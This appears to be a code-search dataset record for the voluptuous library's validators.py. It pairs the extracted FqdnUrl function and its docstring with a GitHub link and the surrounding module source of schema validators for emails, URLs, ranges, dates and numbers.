                raise Invalid(self.msg or "Precision must be equal to %s" % self.precision)
            if self.scale is not None and scale != self.scale:
                raise Invalid(self.msg or "Scale must be equal to %s" % self.scale)
            if self.yield_decimal:
                return decimal_num
            else:
                return v
    def __repr__(self):
        return ('Number(precision=%s, scale=%s, msg=%s)' % (self.precision, self.scale, self.msg))
    def _get_precision_scale(self, number):
        """
        :param number:
        :return: tuple(precision, scale, decimal_number)
        """
        try:
            decimal_num = Decimal(number)
        except InvalidOperation:
            raise Invalid(self.msg or 'Value must be a number enclosed with string')
        # precision = total digit count of the Decimal; scale = -(exponent),
        # i.e. the number of digits to the right of the decimal point.
        return (len(decimal_num.as_tuple().digits), -(decimal_num.as_tuple().exponent), decimal_num)
class SomeOf(_WithSubValidators):
    """Value must pass at least some validations, determined by the given parameter.
    Optionally, number of passed validations can be capped.
    The output of each validator is passed as input to the next.
    :param min_valid: Minimum number of valid schemas.
    :param validators: a list of schemas or validators to match input against
    :param max_valid: Maximum number of valid schemas.
    :param msg: Message to deliver to user if validation fails.
    :param kwargs: All other keyword arguments are passed to the sub-Schema constructors.
    :raises NotEnoughValid: if the minimum number of validations isn't met
    :raises TooManyValid: if the more validations than the given amount is met
    >>> validate = Schema(SomeOf(min_valid=2, validators=[Range(1, 5), Any(float, int), 6.6]))
    >>> validate(6.6)
    6.6
    >>> validate(3)
    3
    >>> with raises(MultipleInvalid, 'value must be at most 5, not a valid value'):
    ...     validate(6.2)
    """
    def __init__(self, validators, min_valid=None, max_valid=None, **kwargs):
        assert min_valid is not None or max_valid is not None, \
            'when using "%s" you should specify at least one of min_valid and max_valid' % (type(self).__name__,)
        # Unspecified bounds default to the loosest possible constraint.
        self.min_valid = min_valid or 0
        self.max_valid = max_valid or len(validators)
        super(SomeOf, self).__init__(*validators, **kwargs)
    def _exec(self, funcs, v, path=None):
        errors = []
        funcs = list(funcs)
        # Run EVERY validator; each success threads its output into ``v``.
        for func in funcs:
            try:
                if path is None:
                    v = func(v)
                else:
                    v = func(path, v)
            except Invalid as e:
                errors.append(e)
        passed_count = len(funcs) - len(errors)
        if self.min_valid <= passed_count <= self.max_valid:
            return v
        msg = self.msg
        if not msg:
            msg = ', '.join(map(str, errors))
        if passed_count > self.max_valid:
            raise TooManyValid(msg)
        raise NotEnoughValid(msg)
    def __repr__(self):
        return 'SomeOf(min_valid=%s, validators=[%s], max_valid=%s, msg=%r)' % (
            self.min_valid, ", ".join(repr(v) for v in self.validators), self.max_valid, self.msg)
|
alecthomas/voluptuous | voluptuous/validators.py | FqdnUrl | python | def FqdnUrl(v):
try:
parsed_url = _url_validation(v)
if "." not in parsed_url.netloc:
raise UrlInvalid("must have a domain name in URL")
return v
except:
raise ValueError | Verify that the value is a Fully qualified domain name URL.
>>> s = Schema(FqdnUrl())
>>> with raises(MultipleInvalid, 'expected a Fully qualified domain name URL'):
... s("http://localhost/")
>>> s('http://w3.org')
'http://w3.org' | train | https://github.com/alecthomas/voluptuous/blob/36c8c11e2b7eb402c24866fa558473661ede9403/voluptuous/validators.py#L392-L407 | [
"def _url_validation(v):\n parsed = urlparse.urlparse(v)\n if not parsed.scheme or not parsed.netloc:\n raise UrlInvalid(\"must have a URL scheme and host\")\n return parsed\n"
] | import os
import re
import datetime
import sys
from functools import wraps
from decimal import Decimal, InvalidOperation
from voluptuous.schema_builder import Schema, raises, message
from voluptuous.error import (MultipleInvalid, CoerceInvalid, TrueInvalid, FalseInvalid, BooleanInvalid, Invalid,
AnyInvalid, AllInvalid, MatchInvalid, UrlInvalid, EmailInvalid, FileInvalid, DirInvalid,
RangeInvalid, PathInvalid, ExactSequenceInvalid, LengthInvalid, DatetimeInvalid,
DateInvalid, InInvalid, TypeInvalid, NotInInvalid, ContainsInvalid, NotEnoughValid,
TooManyValid)
if sys.version_info >= (3,):
import urllib.parse as urlparse
basestring = str
else:
import urlparse
# Taken from https://github.com/kvesteri/validators/blob/master/validators/email.py
# Matches the local (user) part of an email address: either a dot-atom or a
# quoted-string form.
USER_REGEX = re.compile(
    # dot-atom
    r"(^[-!#$%&'*+/=?^_`{}|~0-9A-Z]+"
    r"(\.[-!#$%&'*+/=?^_`{}|~0-9A-Z]+)*$"
    # quoted-string
    r'|^"([\001-\010\013\014\016-\037!#-\[\]-\177]|'
    r"""\\[\001-\011\013\014\016-\177])*"$)""",
    re.IGNORECASE
)
# Matches the domain part: a dotted hostname, or a bracketed IPv4 literal.
DOMAIN_REGEX = re.compile(
    # domain
    r'(?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\.)+'
    r'(?:[A-Z]{2,6}\.?|[A-Z0-9-]{2,}\.?$)'
    # literal form, ipv4 address (SMTP 4.1.3)
    r'|^\[(25[0-5]|2[0-4]\d|[0-1]?\d?\d)'
    r'(\.(25[0-5]|2[0-4]\d|[0-1]?\d?\d)){3}\]$',
    re.IGNORECASE)
__author__ = 'tusharmakkar08'
def truth(f):
    """Convenience decorator to convert truth functions into validators.
    >>> @truth
    ... def isdir(v):
    ...     return os.path.isdir(v)
    >>> validate = Schema(isdir)
    >>> validate('/')
    '/'
    >>> with raises(MultipleInvalid, 'not a valid value'):
    ...     validate('/notavaliddir')
    """
    @wraps(f)
    def check(v):
        # A falsy result marks the value invalid; ValueError is the signal
        # the schema machinery converts into an Invalid error.
        if not f(v):
            raise ValueError
        return v
    return check
class Coerce(object):
    """Coerce a value to a type.
    If the type constructor throws a ValueError or TypeError, the value
    will be marked as Invalid.
    Default behavior:
    >>> validate = Schema(Coerce(int))
    >>> with raises(MultipleInvalid, 'expected int'):
    ...     validate(None)
    >>> with raises(MultipleInvalid, 'expected int'):
    ...     validate('foo')
    With custom message:
    >>> validate = Schema(Coerce(int, "moo"))
    >>> with raises(MultipleInvalid, 'moo'):
    ...     validate('foo')
    """
    def __init__(self, type, msg=None):
        # ``type`` may be any unary callable, e.g. ``int`` or ``Decimal``.
        self.type = type
        self.msg = msg
        self.type_name = type.__name__
    def __call__(self, v):
        try:
            return self.type(v)
        except (ValueError, TypeError, InvalidOperation):
            # Conversion failed; report the target type (or custom message).
            raise CoerceInvalid(self.msg or ('expected %s' % self.type_name))
    def __repr__(self):
        return 'Coerce(%s, msg=%r)' % (self.type_name, self.msg)
@message('value was not true', cls=TrueInvalid)
@truth
def IsTrue(v):
    """Assert that a value is true, in the Python sense.
    >>> validate = Schema(IsTrue())
    "In the Python sense" means that implicitly false values, such as empty
    lists, dictionaries, etc. are treated as "false":
    >>> with raises(MultipleInvalid, "value was not true"):
    ...     validate([])
    >>> validate([1])
    [1]
    >>> with raises(MultipleInvalid, "value was not true"):
    ...     validate(False)
    ...and so on.
    >>> try:
    ...     validate([])
    ... except MultipleInvalid as e:
    ...     assert isinstance(e.errors[0], TrueInvalid)
    """
    # @truth rejects falsy values before we get here; just echo v through.
    return v
@message('value was not false', cls=FalseInvalid)
def IsFalse(v):
    """Assert that a value is false, in the Python sense.

    (see :func:`IsTrue` for more detail)

    >>> validate = Schema(IsFalse())
    >>> validate([])
    []
    >>> with raises(MultipleInvalid, "value was not false"):
    ...   validate(True)

    >>> try:
    ...  validate(True)
    ... except MultipleInvalid as e:
    ...   assert isinstance(e.errors[0], FalseInvalid)
    """
    # Truthy values are invalid; falsy values pass through untouched.
    if bool(v):
        raise ValueError
    return v
@message('expected boolean', cls=BooleanInvalid)
def Boolean(v):
    """Convert human-readable boolean values to a bool.

    Accepted values are 1, true, yes, on, enable, and their negatives.
    Non-string values are cast to bool.

    >>> validate = Schema(Boolean())
    >>> validate(True)
    True
    >>> validate("1")
    True
    >>> validate("0")
    False
    >>> with raises(MultipleInvalid, "expected boolean"):
    ...   validate('moo')
    >>> try:
    ...  validate('moo')
    ... except MultipleInvalid as e:
    ...   assert isinstance(e.errors[0], BooleanInvalid)
    """
    # Non-strings fall straight through to a plain truthiness cast.
    if not isinstance(v, basestring):
        return bool(v)
    lowered = v.lower()
    if lowered in ('1', 'true', 'yes', 'on', 'enable'):
        return True
    if lowered in ('0', 'false', 'no', 'off', 'disable'):
        return False
    # Any other string is rejected (converted by @message into BooleanInvalid).
    raise ValueError
class _WithSubValidators(object):
    """Base class for validators that use sub-validators.

    Special class to use as a parent class for validators using sub-validators.
    This class provides the `__voluptuous_compile__` method so the
    sub-validators are compiled by the parent `Schema`.
    """

    def __init__(self, *validators, **kwargs):
        # Positional arguments are the sub-validators; only 'msg' and
        # 'required' are recognised options (other kwargs are ignored here).
        self.validators = validators
        self.msg = kwargs.pop('msg', None)
        self.required = kwargs.pop('required', False)

    def __voluptuous_compile__(self, schema):
        # Hook invoked by the enclosing Schema during compilation: compile
        # each sub-validator and hand back _run as the compiled callable.
        # NOTE(review): schema.required is mutated before each sub-compile —
        # presumably so sub-schemas inherit this validator's 'required'
        # flag; confirm against schema_builder._compile.
        self._compiled = []
        for v in self.validators:
            schema.required = self.required
            self._compiled.append(schema._compile(v))
        return self._run

    def _run(self, path, value):
        # Path-aware entry point used when compiled inside a parent Schema.
        return self._exec(self._compiled, value, path)

    def __call__(self, v):
        # Standalone use (no parent Schema): wrap each sub-validator in its
        # own Schema lazily. Subclasses must implement _exec().
        return self._exec((Schema(val) for val in self.validators), v)

    def __repr__(self):
        return '%s(%s, msg=%r)' % (
            self.__class__.__name__,
            ", ".join(repr(v) for v in self.validators),
            self.msg
        )
class Any(_WithSubValidators):
    """Use the first validated value.

    :param msg: Message to deliver to user if validation fails.
    :param kwargs: All other keyword arguments are passed to the sub-Schema constructors.
    :returns: Return value of the first validator that passes.

    >>> validate = Schema(Any('true', 'false',
    ...                       All(Any(int, bool), Coerce(bool))))
    >>> validate('true')
    'true'
    >>> validate(1)
    True
    >>> with raises(MultipleInvalid, "not a valid value"):
    ...   validate('moo')

    msg argument is used

    >>> validate = Schema(Any(1, 2, 3, msg="Expected 1 2 or 3"))
    >>> validate(1)
    1
    >>> with raises(MultipleInvalid, "Expected 1 2 or 3"):
    ...   validate(4)
    """

    def _exec(self, funcs, v, path=None):
        # Try each sub-validator in order; the first success short-circuits.
        error = None
        for func in funcs:
            try:
                if path is None:
                    return func(v)
                else:
                    return func(path, v)
            except Invalid as e:
                # Keep the failure with the deepest error path — it is the
                # most specific one and therefore the most useful to report.
                if error is None or len(e.path) > len(error.path):
                    error = e
        else:
            # for/else: reached only when no validator succeeded. Re-raise
            # the recorded error unless a custom msg overrides it.
            if error:
                raise error if self.msg is None else AnyInvalid(
                    self.msg, path=path)
            raise AnyInvalid(self.msg or 'no valid value found',
                             path=path)


# Convenience alias
Or = Any
class All(_WithSubValidators):
    """Value must pass all validators.

    The output of each validator is passed as input to the next.

    :param msg: Message to deliver to user if validation fails.
    :param kwargs: All other keyword arguments are passed to the sub-Schema constructors.

    >>> validate = Schema(All('10', Coerce(int)))
    >>> validate('10')
    10
    """

    def _exec(self, funcs, v, path=None):
        # Thread the value through every validator; any failure aborts.
        try:
            for validate in funcs:
                v = validate(v) if path is None else validate(path, v)
        except Invalid:
            if self.msg is None:
                raise
            raise AllInvalid(self.msg, path=path)
        return v


# Convenience alias
And = All
class Match(object):
    """Value must be a string that matches the regular expression.

    >>> validate = Schema(Match(r'^0x[A-F0-9]+$'))
    >>> validate('0x123EF4')
    '0x123EF4'
    >>> with raises(MultipleInvalid, "does not match regular expression"):
    ...   validate('123EF4')

    >>> with raises(MultipleInvalid, 'expected string or buffer'):
    ...   validate(123)

    Pattern may also be a compiled regular expression:

    >>> validate = Schema(Match(re.compile(r'0x[A-F0-9]+', re.I)))
    >>> validate('0x123ef4')
    '0x123ef4'
    """

    def __init__(self, pattern, msg=None):
        # Accept either a pattern string (compiled here) or a pre-compiled
        # regular expression object.
        self.pattern = re.compile(pattern) if isinstance(pattern, basestring) else pattern
        self.msg = msg

    def __call__(self, v):
        try:
            matched = self.pattern.match(v)
        except TypeError:
            # re raises TypeError for non-string/non-buffer input.
            raise MatchInvalid("expected string or buffer")
        if not matched:
            raise MatchInvalid(self.msg or 'does not match regular expression')
        return v

    def __repr__(self):
        return 'Match(%r, msg=%r)' % (self.pattern.pattern, self.msg)
class Replace(object):
    """Regex substitution.

    >>> validate = Schema(All(Replace('you', 'I'),
    ...                       Replace('hello', 'goodbye')))
    >>> validate('you say hello')
    'I say goodbye'
    """

    def __init__(self, pattern, substitution, msg=None):
        # Pattern strings are compiled; compiled patterns pass through.
        self.pattern = re.compile(pattern) if isinstance(pattern, basestring) else pattern
        self.substitution = substitution
        self.msg = msg

    def __call__(self, v):
        # msg is accepted for API symmetry, but substitution cannot fail.
        return self.pattern.sub(self.substitution, v)

    def __repr__(self):
        return 'Replace(%r, %r, msg=%r)' % (self.pattern.pattern,
                                            self.substitution,
                                            self.msg)
def _url_validation(v):
parsed = urlparse.urlparse(v)
if not parsed.scheme or not parsed.netloc:
raise UrlInvalid("must have a URL scheme and host")
return parsed
@message('expected an Email', cls=EmailInvalid)
def Email(v):
    """Verify that the value is an Email or not.

    >>> s = Schema(Email())
    >>> with raises(MultipleInvalid, 'expected an Email'):
    ...   s("a.com")
    >>> with raises(MultipleInvalid, 'expected an Email'):
    ...   s("a@.com")
    >>> with raises(MultipleInvalid, 'expected an Email'):
    ...   s("a@.com")
    >>> s('t@x.com')
    't@x.com'
    """
    try:
        if not v or "@" not in v:
            raise EmailInvalid("Invalid Email")
        user_part, domain_part = v.rsplit('@', 1)
        if not (USER_REGEX.match(user_part) and DOMAIN_REGEX.match(domain_part)):
            raise EmailInvalid("Invalid Email")
        return v
    except (EmailInvalid, TypeError, AttributeError):
        # Narrowed from a bare ``except:`` which also swallowed
        # KeyboardInterrupt/SystemExit. TypeError covers non-container
        # values for the ``in`` test, AttributeError covers values without
        # .rsplit. ValueError is re-raised so the @message decorator turns
        # any failure into EmailInvalid('expected an Email'), as before.
        raise ValueError
@message('expected a Fully qualified domain name URL', cls=UrlInvalid)
def FqdnUrl(v):
    """Verify that the value is a fully qualified domain name URL.

    Restores the missing FqdnUrl function: its @message decorator was left
    stranded on top of Url's decorator, which both dropped this validator
    and mislabeled Url's failures.

    >>> s = Schema(FqdnUrl())
    >>> with raises(MultipleInvalid, 'expected a Fully qualified domain name URL'):
    ...   s("http://localhost/")
    >>> s('http://w3.org')
    'http://w3.org'
    """
    try:
        parsed_url = _url_validation(v)
        if "." not in parsed_url.netloc:
            raise UrlInvalid("must have a domain name in URL")
        return v
    except (UrlInvalid, AttributeError, TypeError, ValueError):
        # Narrowed from a bare ``except:``; ValueError re-raised so the
        # @message decorator produces the UrlInvalid error as before.
        raise ValueError


@message('expected a URL', cls=UrlInvalid)
def Url(v):
    """Verify that the value is a URL.

    >>> s = Schema(Url())
    >>> with raises(MultipleInvalid, 'expected a URL'):
    ...   s(1)
    >>> s('http://w3.org')
    'http://w3.org'
    """
    try:
        _url_validation(v)
        return v
    except (UrlInvalid, AttributeError, TypeError, ValueError):
        # Narrowed from a bare ``except:`` (see FqdnUrl).
        raise ValueError
@message('not a file', cls=FileInvalid)
@truth
def IsFile(v):
    """Verify the file exists.

    >>> os.path.basename(IsFile()(__file__)).startswith('validators.py')
    True
    >>> with raises(FileInvalid, 'not a file'):
    ...   IsFile()("random_filename_goes_here.py")
    >>> with raises(FileInvalid, 'Not a file'):
    ...   IsFile()(None)
    """
    try:
        if not v:
            # Falsy input (None, '', ...) is rejected outright.
            raise FileInvalid('Not a file')
        return os.path.isfile(str(v))
    except TypeError:
        raise FileInvalid('Not a file')
@message('not a directory', cls=DirInvalid)
@truth
def IsDir(v):
    """Verify the directory exists.

    >>> IsDir()('/')
    '/'
    >>> with raises(DirInvalid, 'Not a directory'):
    ...   IsDir()(None)
    """
    try:
        if not v:
            # Falsy input (None, '', ...) is rejected outright.
            raise DirInvalid("Not a directory")
        return os.path.isdir(str(v))
    except TypeError:
        raise DirInvalid("Not a directory")
@message('path does not exist', cls=PathInvalid)
@truth
def PathExists(v):
    """Verify the path exists, regardless of its type.

    >>> os.path.basename(PathExists()(__file__)).startswith('validators.py')
    True
    >>> with raises(Invalid, 'path does not exist'):
    ...   PathExists()("random_filename_goes_here.py")
    >>> with raises(PathInvalid, 'Not a Path'):
    ...   PathExists()(None)
    """
    try:
        if not v:
            # Falsy input (None, '', ...) is rejected outright.
            raise PathInvalid("Not a Path")
        return os.path.exists(str(v))
    except TypeError:
        raise PathInvalid("Not a Path")
def Maybe(validator, msg=None):
    """Validate that the object matches given validator or is None.

    Implemented as a thin wrapper over :class:`Any` with ``None`` as the
    first accepted alternative.

    :raises Invalid: if the value does not match the given validator and is not
        None

    >>> s = Schema(Maybe(int))
    >>> s(10)
    10
    >>> with raises(Invalid):
    ...  s("string")
    """
    return Any(None, validator, msg=msg)
class Range(object):
    """Limit a value to a range.

    Either min or max may be omitted.
    Either min or max can be excluded from the range of accepted values.

    :raises Invalid: If the value is outside the range.

    >>> s = Schema(Range(min=1, max=10, min_included=False))
    >>> s(5)
    5
    >>> s(10)
    10
    >>> with raises(MultipleInvalid, 'value must be at most 10'):
    ...   s(20)
    >>> with raises(MultipleInvalid, 'value must be higher than 1'):
    ...   s(1)
    >>> with raises(MultipleInvalid, 'value must be lower than 10'):
    ...   Schema(Range(max=10, max_included=False))(20)
    """

    def __init__(self, min=None, max=None, min_included=True,
                 max_included=True, msg=None):
        self.min = min
        self.max = max
        self.min_included = min_included
        self.max_included = max_included
        self.msg = msg

    def __call__(self, v):
        # Negated comparisons (``not v >= min``) are deliberate: they also
        # reject values whose comparison operators return falsy non-bools.
        if self.min is not None:
            if self.min_included:
                if not v >= self.min:
                    raise RangeInvalid(
                        self.msg or 'value must be at least %s' % self.min)
            elif not v > self.min:
                raise RangeInvalid(
                    self.msg or 'value must be higher than %s' % self.min)
        if self.max is not None:
            if self.max_included:
                if not v <= self.max:
                    raise RangeInvalid(
                        self.msg or 'value must be at most %s' % self.max)
            elif not v < self.max:
                raise RangeInvalid(
                    self.msg or 'value must be lower than %s' % self.max)
        return v

    def __repr__(self):
        return ('Range(min=%r, max=%r, min_included=%r,'
                ' max_included=%r, msg=%r)' % (self.min, self.max,
                                               self.min_included,
                                               self.max_included,
                                               self.msg))
class Clamp(object):
    """Clamp a value to a range.

    Either min or max may be omitted.

    >>> s = Schema(Clamp(min=0, max=1))
    >>> s(0.5)
    0.5
    >>> s(5)
    1
    >>> s(-1)
    0
    """

    def __init__(self, min=None, max=None, msg=None):
        self.min = min
        self.max = max
        # msg is accepted for API symmetry; clamping never fails.
        self.msg = msg

    def __call__(self, v):
        clamped = v
        if self.min is not None and clamped < self.min:
            clamped = self.min
        if self.max is not None and clamped > self.max:
            clamped = self.max
        return clamped

    def __repr__(self):
        return 'Clamp(min=%s, max=%s)' % (self.min, self.max)
class Length(object):
    """The length of a value must be in a certain range."""

    def __init__(self, min=None, max=None, msg=None):
        self.min = min
        self.max = max
        self.msg = msg

    def __call__(self, v):
        size = len(v)
        if self.min is not None and size < self.min:
            raise LengthInvalid(
                self.msg or 'length of value must be at least %s' % self.min)
        if self.max is not None and size > self.max:
            raise LengthInvalid(
                self.msg or 'length of value must be at most %s' % self.max)
        return v

    def __repr__(self):
        return 'Length(min=%s, max=%s)' % (self.min, self.max)
class Datetime(object):
    """Validate that the value matches the datetime format."""

    DEFAULT_FORMAT = '%Y-%m-%dT%H:%M:%S.%fZ'

    def __init__(self, format=None, msg=None):
        # Fall back to the ISO-8601-style default when no format is given.
        self.format = format or self.DEFAULT_FORMAT
        self.msg = msg

    def __call__(self, v):
        # Only validates; the parsed datetime is discarded and the original
        # string is returned unchanged.
        try:
            datetime.datetime.strptime(v, self.format)
        except (TypeError, ValueError):
            raise DatetimeInvalid(
                self.msg or 'value does not match'
                ' expected format %s' % self.format)
        return v

    def __repr__(self):
        return 'Datetime(format=%s)' % self.format
class Date(Datetime):
    """Validate that the value matches the date format."""

    DEFAULT_FORMAT = '%Y-%m-%d'

    def __call__(self, v):
        # Same validate-and-discard behaviour as Datetime, but raises the
        # date-specific error class.
        try:
            datetime.datetime.strptime(v, self.format)
        except (TypeError, ValueError):
            raise DateInvalid(
                self.msg or 'value does not match'
                ' expected format %s' % self.format)
        return v

    def __repr__(self):
        return 'Date(format=%s)' % self.format
class In(object):
    """Validate that a value is in a collection."""

    def __init__(self, container, msg=None):
        self.container = container
        self.msg = msg

    def __call__(self, v):
        try:
            missing = v not in self.container
        except TypeError:
            # Unhashable values against set-like containers, etc. count as
            # "not in".
            missing = True
        if missing:
            raise InInvalid(self.msg or 'value is not allowed')
        return v

    def __repr__(self):
        return 'In(%s)' % (self.container,)
class NotIn(object):
    """Validate that a value is not in a collection."""

    def __init__(self, container, msg=None):
        self.container = container
        self.msg = msg

    def __call__(self, v):
        try:
            present = v in self.container
        except TypeError:
            # An uncheckable membership test is treated as a failure.
            present = True
        if present:
            raise NotInInvalid(self.msg or 'value is not allowed')
        return v

    def __repr__(self):
        return 'NotIn(%s)' % (self.container,)
class Contains(object):
    """Validate that the given schema element is in the sequence being validated.

    >>> s = Contains(1)
    >>> s([3, 2, 1])
    [3, 2, 1]
    >>> with raises(ContainsInvalid, 'value is not allowed'):
    ...   s([3, 2])
    """

    def __init__(self, item, msg=None):
        self.item = item
        self.msg = msg

    def __call__(self, v):
        try:
            absent = self.item not in v
        except TypeError:
            # Non-container input cannot contain the item.
            absent = True
        if absent:
            raise ContainsInvalid(self.msg or 'value is not allowed')
        return v

    def __repr__(self):
        return 'Contains(%s)' % (self.item,)
class ExactSequence(object):
    """Matches each element in a sequence against the corresponding element in
    the validators.

    :param msg: Message to deliver to user if validation fails.
    :param kwargs: All other keyword arguments are passed to the sub-Schema
        constructors.

    >>> from voluptuous import Schema, ExactSequence
    >>> validate = Schema(ExactSequence([str, int, list, list]))
    >>> validate(['hourly_report', 10, [], []])
    ['hourly_report', 10, [], []]
    >>> validate(('hourly_report', 10, [], []))
    ('hourly_report', 10, [], [])
    """

    def __init__(self, validators, **kwargs):
        self.validators = validators
        self.msg = kwargs.pop('msg', None)
        # One Schema per positional validator; remaining kwargs configure
        # every sub-Schema identically.
        self._schemas = [Schema(val, **kwargs) for val in validators]

    def __call__(self, v):
        # Length and type must match exactly before element-wise validation.
        if not isinstance(v, (list, tuple)) or len(v) != len(self._schemas):
            raise ExactSequenceInvalid(self.msg)
        try:
            # Rebuild with the input's own type so tuples stay tuples.
            v = type(v)(schema(x) for x, schema in zip(v, self._schemas))
        except Invalid:
            if self.msg is None:
                raise
            raise ExactSequenceInvalid(self.msg)
        return v

    def __repr__(self):
        return 'ExactSequence([%s])' % (", ".join(repr(v)
                                                  for v in self.validators))
class Unique(object):
    """Ensure an iterable does not contain duplicate items.

    Only iterables convertable to a set are supported (native types and
    objects with correct __eq__).

    JSON does not support set, so they need to be presented as arrays.
    Unique allows ensuring that such array does not contain dupes.

    >>> s = Schema(Unique())
    >>> s([])
    []
    >>> s([1, 2])
    [1, 2]
    >>> with raises(Invalid, 'contains duplicate items: [1]'):
    ...   s([1, 1, 2])
    >>> with raises(Invalid, "contains duplicate items: ['one']"):
    ...   s(['one', 'two', 'one'])
    >>> with raises(Invalid, regex="^contains unhashable elements: "):
    ...   s([set([1, 2]), set([3, 4])])
    >>> s('abc')
    'abc'
    >>> with raises(Invalid, regex="^contains duplicate items: "):
    ...   s('aabbc')
    """

    def __init__(self, msg=None):
        self.msg = msg

    def __call__(self, v):
        try:
            distinct = set(v)
        except TypeError as e:
            raise TypeInvalid(
                self.msg or 'contains unhashable elements: {0}'.format(e))
        if len(distinct) != len(v):
            # Second pass only runs on failure, to name the duplicates:
            # seen.add(x) returns None, so the predicate keeps exactly the
            # elements encountered more than once.
            seen = set()
            dupes = list(set(x for x in v if x in seen or seen.add(x)))
            raise Invalid(
                self.msg or 'contains duplicate items: {0}'.format(dupes))
        return v

    def __repr__(self):
        return 'Unique()'
class Equal(object):
    """Ensure that value matches target.

    >>> s = Schema(Equal(1))
    >>> s(1)
    1
    >>> with raises(Invalid):
    ...    s(2)

    Validators are not supported, match must be exact:

    >>> s = Schema(Equal(str))
    >>> with raises(Invalid):
    ...     s('foo')
    """

    def __init__(self, target, msg=None):
        # Comparison is by equality only — the target is never invoked.
        self.target = target
        self.msg = msg

    def __call__(self, v):
        if v != self.target:
            raise Invalid(self.msg or 'Values are not equal: value:{} != target:{}'.format(v, self.target))
        return v

    def __repr__(self):
        return 'Equal({})'.format(self.target)
class Unordered(object):
    """Ensures sequence contains values in unspecified order.

    >>> s = Schema(Unordered([2, 1]))
    >>> s([2, 1])
    [2, 1]
    >>> s([1, 2])
    [1, 2]
    >>> s = Schema(Unordered([str, int]))
    >>> s(['foo', 1])
    ['foo', 1]
    >>> s([1, 'foo'])
    [1, 'foo']
    """

    def __init__(self, validators, msg=None, **kwargs):
        self.validators = validators
        self.msg = msg
        # One pre-built Schema per validator; extra kwargs configure each.
        self._schemas = [Schema(val, **kwargs) for val in validators]

    def __call__(self, v):
        if not isinstance(v, (list, tuple)):
            raise Invalid(self.msg or 'Value {} is not sequence!'.format(v))
        if len(v) != len(self._schemas):
            raise Invalid(self.msg or 'List lengths differ, value:{} != target:{}'.format(len(v), len(self._schemas)))
        # Greedy matching: each element consumes the FIRST still-unused
        # schema that accepts it. O(n^2) worst case; greedy choice order can
        # matter for overlapping validators.
        consumed = set()
        missing = []
        for index, value in enumerate(v):
            found = False
            for i, s in enumerate(self._schemas):
                if i in consumed:
                    continue
                try:
                    s(value)
                except Invalid:
                    pass
                else:
                    found = True
                    consumed.add(i)
                    break
            if not found:
                missing.append((index, value))
        # One unmatched element -> single Invalid; several -> MultipleInvalid
        # bundling one Invalid per unmatched element.
        if len(missing) == 1:
            el = missing[0]
            raise Invalid(self.msg or 'Element #{} ({}) is not valid against any validator'.format(el[0], el[1]))
        elif missing:
            raise MultipleInvalid([Invalid(self.msg or 'Element #{} ({}) is not valid against any validator'.format(
                el[0], el[1])) for el in missing])
        return v

    def __repr__(self):
        return 'Unordered([{}])'.format(", ".join(repr(v) for v in self.validators))
class Number(object):
    """
    Verify the number of digits that are present in the number(Precision),
    and the decimal places(Scale)

    :raises Invalid: If the value does not match the provided Precision and Scale.

    >>> schema = Schema(Number(precision=6, scale=2))
    >>> schema('1234.01')
    '1234.01'
    >>> schema = Schema(Number(precision=6, scale=2, yield_decimal=True))
    >>> schema('1234.01')
    Decimal('1234.01')
    """

    def __init__(self, precision=None, scale=None, msg=None, yield_decimal=False):
        self.precision = precision
        self.scale = scale
        self.msg = msg
        self.yield_decimal = yield_decimal

    def __call__(self, v):
        """
        :param v: is a number enclosed with string
        :return: Decimal number
        """
        precision, scale, decimal_num = self._get_precision_scale(v)

        # Combined message only when BOTH constraints are set and BOTH
        # mismatch; otherwise each constraint reports individually.
        both_set = self.precision is not None and self.scale is not None
        if both_set and precision != self.precision and scale != self.scale:
            raise Invalid(self.msg or "Precision must be equal to %s, and Scale must be equal to %s" % (self.precision,
                                                                                                        self.scale))
        if self.precision is not None and precision != self.precision:
            raise Invalid(self.msg or "Precision must be equal to %s" % self.precision)
        if self.scale is not None and scale != self.scale:
            raise Invalid(self.msg or "Scale must be equal to %s" % self.scale)

        return decimal_num if self.yield_decimal else v

    def __repr__(self):
        return ('Number(precision=%s, scale=%s, msg=%s)' % (self.precision, self.scale, self.msg))

    def _get_precision_scale(self, number):
        """
        :param number:
        :return: tuple(precision, scale, decimal_number)
        """
        try:
            decimal_num = Decimal(number)
        except InvalidOperation:
            raise Invalid(self.msg or 'Value must be a number enclosed with string')

        # precision = total digit count, scale = -exponent (digits after
        # the decimal point for ordinary fixed-point strings).
        digits_exp = decimal_num.as_tuple()
        return (len(digits_exp.digits), -(digits_exp.exponent), decimal_num)
class SomeOf(_WithSubValidators):
    """Value must pass at least some validations, determined by the given parameter.
    Optionally, number of passed validations can be capped.

    The output of each validator is passed as input to the next.

    :param min_valid: Minimum number of valid schemas.
    :param validators: a list of schemas or validators to match input against
    :param max_valid: Maximum number of valid schemas.
    :param msg: Message to deliver to user if validation fails.
    :param kwargs: All other keyword arguments are passed to the sub-Schema constructors.

    :raises NotEnoughValid: if the minimum number of validations isn't met
    :raises TooManyValid: if the more validations than the given amount is met

    >>> validate = Schema(SomeOf(min_valid=2, validators=[Range(1, 5), Any(float, int), 6.6]))
    >>> validate(6.6)
    6.6
    >>> validate(3)
    3
    >>> with raises(MultipleInvalid, 'value must be at most 5, not a valid value'):
    ...     validate(6.2)
    """

    def __init__(self, validators, min_valid=None, max_valid=None, **kwargs):
        # At least one bound is mandatory; unset bounds default to the
        # loosest constraint (0 / all validators).
        assert min_valid is not None or max_valid is not None, \
            'when using "%s" you should specify at least one of min_valid and max_valid' % (type(self).__name__,)
        self.min_valid = min_valid or 0
        self.max_valid = max_valid or len(validators)
        super(SomeOf, self).__init__(*validators, **kwargs)

    def _exec(self, funcs, v, path=None):
        errors = []
        funcs = list(funcs)
        for func in funcs:
            try:
                # v is threaded through each SUCCESSFUL validator, so later
                # validators see the (possibly coerced) output of earlier
                # ones; failures leave v unchanged.
                if path is None:
                    v = func(v)
                else:
                    v = func(path, v)
            except Invalid as e:
                errors.append(e)

        passed_count = len(funcs) - len(errors)
        if self.min_valid <= passed_count <= self.max_valid:
            return v

        # Out of bounds: report either a custom msg or all collected errors.
        msg = self.msg
        if not msg:
            msg = ', '.join(map(str, errors))

        if passed_count > self.max_valid:
            raise TooManyValid(msg)

        raise NotEnoughValid(msg)

    def __repr__(self):
        return 'SomeOf(min_valid=%s, validators=[%s], max_valid=%s, msg=%r)' % (
            self.min_valid, ", ".join(repr(v) for v in self.validators), self.max_valid, self.msg)
|
alecthomas/voluptuous | voluptuous/validators.py | IsFile | python | def IsFile(v):
try:
if v:
v = str(v)
return os.path.isfile(v)
else:
raise FileInvalid('Not a file')
except TypeError:
